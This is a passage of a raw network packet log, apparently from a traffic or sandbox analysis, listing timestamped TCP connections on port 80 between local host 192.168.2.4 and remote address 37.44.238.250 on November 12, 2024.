                                                                                                            Nov 12, 2024 00:43:01.093492031 CET804979237.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:01.319950104 CET804979237.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:01.399549961 CET804979237.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:01.399626970 CET4979280192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:01.744508982 CET4979280192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:01.747427940 CET4979380192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:01.749850035 CET804979237.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:01.749907970 CET4979280192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:01.753664970 CET804979337.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:01.753720045 CET4979380192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:01.753824949 CET4979380192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:01.758706093 CET804979337.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:02.103985071 CET4979380192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:02.135355949 CET804979337.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:02.135370970 CET804979337.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:02.135617971 CET804979337.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:02.338571072 CET804979337.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:02.400646925 CET4979380192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:02.419220924 CET804979337.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:02.510015011 CET4979380192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:02.539247990 CET4979380192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:02.539912939 CET4979580192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:02.544437885 CET804979337.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:02.544501066 CET4979380192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:02.544895887 CET804979537.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:02.544955015 CET4979580192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:02.545066118 CET4979580192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:02.549877882 CET804979537.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:02.900742054 CET4979580192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:02.905627966 CET804979537.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:02.905648947 CET804979537.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:02.905709028 CET804979537.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:03.110636950 CET804979537.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:03.188206911 CET804979537.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:03.188261986 CET4979580192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:03.343028069 CET4979580192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:03.343991041 CET4980180192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:03.348325014 CET804979537.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:03.348368883 CET4979580192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:03.348893881 CET804980137.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:03.348953962 CET4980180192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:03.349071980 CET4980180192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:03.353945971 CET804980137.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:03.495445967 CET4980680192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:03.495528936 CET4980180192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:03.500329018 CET804980637.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:03.500415087 CET4980680192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:03.500494957 CET4980680192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:03.505269051 CET804980637.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:03.540864944 CET804980137.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:03.619250059 CET4980780192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:03.624102116 CET804980737.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:03.627346039 CET4980780192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:03.627464056 CET4980780192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:03.632217884 CET804980737.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:03.765886068 CET804980137.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:03.767352104 CET4980180192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:03.855086088 CET4980680192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:03.859971046 CET804980637.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:03.860014915 CET804980637.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:03.982310057 CET4980780192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:03.987328053 CET804980737.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:03.987343073 CET804980737.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:03.987351894 CET804980737.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:04.099565983 CET804980637.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:04.150655985 CET4980680192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:04.166439056 CET804980637.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:04.193228006 CET804980737.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:04.266643047 CET804980737.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:04.266691923 CET4980780192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:04.353799105 CET4980680192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:04.625082016 CET4980680192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:04.625155926 CET4980780192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:04.626144886 CET4981180192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:04.630306959 CET804980637.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:04.630382061 CET4980680192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:04.630659103 CET804980737.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:04.630712032 CET4980780192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:04.630960941 CET804981137.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:04.631015062 CET4981180192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:04.631130934 CET4981180192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:04.635915041 CET804981137.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:04.978873968 CET4981180192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:05.197417974 CET804981137.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:05.200436115 CET804981137.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:05.200901985 CET804981137.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:05.200911999 CET804981137.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:05.306917906 CET4981180192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:05.432389975 CET804981137.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:05.554825068 CET4981180192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:05.555464983 CET4981980192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:05.561590910 CET804981137.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:05.561666012 CET4981180192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:05.561676025 CET804981937.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:05.561736107 CET4981980192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:05.561860085 CET4981980192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:05.568795919 CET804981937.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:05.916728973 CET4981980192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:05.921664953 CET804981937.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:05.921678066 CET804981937.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:05.921689034 CET804981937.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:06.131098986 CET804981937.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:06.202944040 CET804981937.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:06.203005075 CET4981980192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:06.325612068 CET4981980192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:06.327249050 CET4982580192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:06.330739975 CET804981937.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:06.330790043 CET4981980192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:06.332026005 CET804982537.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:06.332092047 CET4982580192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:06.332216024 CET4982580192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:06.337104082 CET804982537.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:06.683012962 CET4982580192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:06.687922955 CET804982537.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:06.687936068 CET804982537.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:06.687958002 CET804982537.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:06.898207903 CET804982537.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:06.972584963 CET804982537.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:06.975388050 CET4982580192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:07.144293070 CET4983180192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:07.149184942 CET804983137.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:07.149256945 CET4983180192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:07.149437904 CET4983180192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:07.154208899 CET804983137.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:07.494545937 CET4983180192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:07.499479055 CET804983137.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:07.499499083 CET804983137.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:07.499756098 CET804983137.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:07.715240002 CET804983137.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:07.796977997 CET804983137.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:07.797137976 CET4983180192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:07.921590090 CET4983180192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:07.922360897 CET4983780192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:07.927067995 CET804983137.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:07.927158117 CET804983737.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:07.927208900 CET4983180192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:07.927247047 CET4983780192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:07.927342892 CET4983780192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:07.932318926 CET804983737.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:08.276011944 CET4983780192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:08.282771111 CET804983737.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:08.282783031 CET804983737.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:08.282958031 CET804983737.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:08.513143063 CET804983737.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:08.556940079 CET4983780192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:08.593707085 CET804983737.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:08.731726885 CET4983780192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:08.732400894 CET4984380192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:08.739437103 CET804983737.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:08.739963055 CET804984337.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:08.740017891 CET4983780192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:08.740060091 CET4984380192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:08.740202904 CET4984380192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:08.747754097 CET804984337.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:09.088938951 CET4984380192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:09.095916033 CET804984337.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:09.095944881 CET804984337.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:09.096112013 CET804984337.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:09.211061954 CET4984980192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:09.211658955 CET4984380192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:09.218254089 CET804984937.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:09.218322039 CET4984980192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:09.218628883 CET4984980192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:09.218971014 CET804984337.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:09.219016075 CET4984380192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:09.225044966 CET804984937.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:09.579322100 CET4984980192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:09.585623026 CET804984937.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:09.587532043 CET804984937.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:09.710225105 CET4985080192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:09.716192961 CET804985037.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:09.717386007 CET4985080192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:09.718008995 CET4985080192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:09.722872972 CET804985037.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:09.787758112 CET804984937.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:09.853832006 CET4984980192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:09.865981102 CET804984937.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:10.056965113 CET4984980192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:10.073080063 CET4985080192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:10.078010082 CET804985037.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:10.078023911 CET804985037.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:10.078042030 CET804985037.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:10.286243916 CET804985037.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:10.353861094 CET4985080192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:10.362803936 CET804985037.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:10.475641012 CET4984980192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:10.475965023 CET4985080192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:10.476469994 CET4986080192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:10.481002092 CET804984937.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:10.481060028 CET4984980192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:10.481229067 CET804986037.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:10.481287956 CET4986080192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:10.481287956 CET804985037.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:10.481326103 CET4985080192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:10.481400013 CET4986080192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:10.486129999 CET804986037.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:10.838354111 CET4986080192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:10.843198061 CET804986037.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:10.843210936 CET804986037.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:10.843219042 CET804986037.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:11.064681053 CET804986037.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:11.143039942 CET804986037.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:11.143095016 CET4986080192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:11.261843920 CET4986780192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:11.266633034 CET804986737.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:11.266701937 CET4986780192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:11.266812086 CET4986780192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:11.271742105 CET804986737.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:11.619605064 CET4986780192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:11.823823929 CET804986737.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:11.824491978 CET804986737.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:11.824575901 CET804986737.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:11.832807064 CET804986737.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:12.041395903 CET4986780192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:12.056829929 CET804986737.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:12.151135921 CET4986780192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:12.469683886 CET4986780192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:12.470370054 CET4987380192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:12.477150917 CET804986737.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:12.477205038 CET4986780192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:12.477427959 CET804987337.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:12.477489948 CET4987380192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:12.477610111 CET4987380192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:12.484993935 CET804987337.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:12.823370934 CET4987380192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:12.828326941 CET804987337.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:12.828413010 CET804987337.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:12.828464031 CET804987337.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:13.063471079 CET804987337.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:13.141510963 CET804987337.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:13.141597986 CET4987380192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:13.257893085 CET4986080192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:13.265825033 CET4987380192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:13.266671896 CET4987980192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:13.271173000 CET804987337.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:13.271229029 CET4987380192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:13.271446943 CET804987937.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:13.271506071 CET4987980192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:13.271601915 CET4987980192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:13.276449919 CET804987937.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:13.619584084 CET4987980192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:13.624526024 CET804987937.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:13.624541044 CET804987937.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:13.624743938 CET804987937.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:13.856839895 CET804987937.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:13.935003042 CET804987937.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:13.935061932 CET4987980192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:14.054738998 CET4987980192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:14.055032969 CET4988980192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:14.059891939 CET804988937.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:14.059966087 CET4988980192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:14.060132027 CET4988980192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:14.060410023 CET804987937.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:14.060457945 CET4987980192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:14.064898968 CET804988937.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:14.416441917 CET4988980192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:14.421519995 CET804988937.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:14.421572924 CET804988937.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:14.421777010 CET804988937.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:14.624598980 CET804988937.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:14.705497026 CET804988937.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:14.708069086 CET4988980192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:14.912303925 CET4988980192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:14.917475939 CET804988937.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:14.921421051 CET4988980192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:14.924016953 CET4989480192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:14.928802013 CET804989437.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:14.929425955 CET4989480192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:14.931777000 CET4989480192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:14.936548948 CET804989437.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:15.109370947 CET4989480192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:15.114959955 CET4989680192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:15.119797945 CET804989637.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:15.119877100 CET4989680192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:15.119975090 CET4989680192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:15.124738932 CET804989637.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:15.156759024 CET804989437.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:15.337243080 CET804989437.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:15.337311983 CET4989480192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:15.478975058 CET4989680192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:15.483926058 CET804989637.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:15.483937979 CET804989637.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:15.483948946 CET804989637.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:15.702661037 CET804989637.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:15.780616999 CET804989637.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:15.780663013 CET4989680192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:15.895572901 CET4977480192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:15.895638943 CET4982580192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:15.898884058 CET4989680192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:15.899492979 CET4990380192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:15.904139042 CET804989637.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:15.904185057 CET4989680192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:15.904254913 CET804990337.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:15.904314995 CET4990380192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:15.904414892 CET4990380192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:15.909202099 CET804990337.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:16.260261059 CET4990380192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:16.265145063 CET804990337.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:16.265156984 CET804990337.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:16.265166044 CET804990337.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:16.469162941 CET804990337.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:16.510147095 CET4990380192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:16.547019958 CET804990337.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:16.663204908 CET4990380192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:16.664136887 CET4991180192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:16.894324064 CET804990337.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:16.894393921 CET4990380192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:16.895450115 CET804991137.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:16.895519972 CET4991180192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:16.895689011 CET4991180192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:16.896029949 CET804990337.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:16.896085978 CET4990380192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:16.900476933 CET804991137.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:17.244610071 CET4991180192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:17.249584913 CET804991137.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:17.249598980 CET804991137.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:17.249609947 CET804991137.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:17.461260080 CET804991137.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:17.537712097 CET804991137.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:17.541438103 CET4991180192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:17.665621996 CET4991180192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:17.665910006 CET4991780192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:17.670722961 CET804991737.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:17.670736074 CET804991137.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:17.670797110 CET4991180192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:17.670949936 CET4991780192.168.2.437.44.238.250
